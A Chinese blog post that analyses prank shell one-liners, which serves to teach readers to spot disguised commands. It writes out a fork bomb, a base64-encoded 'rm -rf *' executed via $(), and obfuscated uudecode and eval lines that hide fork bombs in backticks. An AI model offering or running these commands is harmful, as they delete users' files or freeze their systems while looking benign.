Leafee98's Blog

使用 fork 炸弹来进行捉弄

· 521 words · 2 minutes to read

⚠️在你还未完全清楚原因时,不要尝试运行这里和文章中提到的代码⚠️

文章来源: https://www.vidarholen.net/contents/blog/?p=766

今天看到了一片关于 shell 的 fork 炸弹的有意思的文章,我也被骗了,现在把它拿出来做一下分析。注意,原文的精妙之处还有很大一部分在于通过看起来朴素的陷阱来淹死那些会游泳的,本文在这里只聊一聊炸弹的组成原理。

在来源文章中,fork 炸弹的核心思想就是无限递归,即定义函数 r,其功能是调用两次自己,然后主动调用一次 r 来启动 fork 炸弹。如下,其中 & 符号的意义是后台运行,表现在 shell 中就是有新的进程产生,或称之为“异步”,这样可以使一瞬间有大量的进程产生,并且 Ctrl-C 的速度是跟不上新进程产生的速度的。

r() ( r & r ); r

原文 tricking 分析 🔗

$(echo cm0gLXJmICoK | base64 -d)

cm0gLXJmICoK 就是 rm -rf * 的 base64 编码后文本,使用 $() 语法来使 shell 运行这个文本。

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

有用的内容全部都在字符串里面,字符串的内容是双引号里面的反引号,这样的话反引号的内容会作为命令去执行,把反引号中 & 符号前的字符(这些字符只能导致 command not found,只用来吸引注意力)移除后就是前边提到的 fork 炸弹。

eval $(echo 'a2Vrf3xvcml'\ZW%3t`r()(r|r);r`2'6a2VrZQo=' | base64 -d)

对于这个,看起来最有威胁性的 eval$() 直接摆出来,单引号的字符串里面不可能有可执行的文本,就会让人很容易放松警惕,但是反引号包裹的 fork 炸弹直接就在单引号外边,是不是很惊喜?


Categories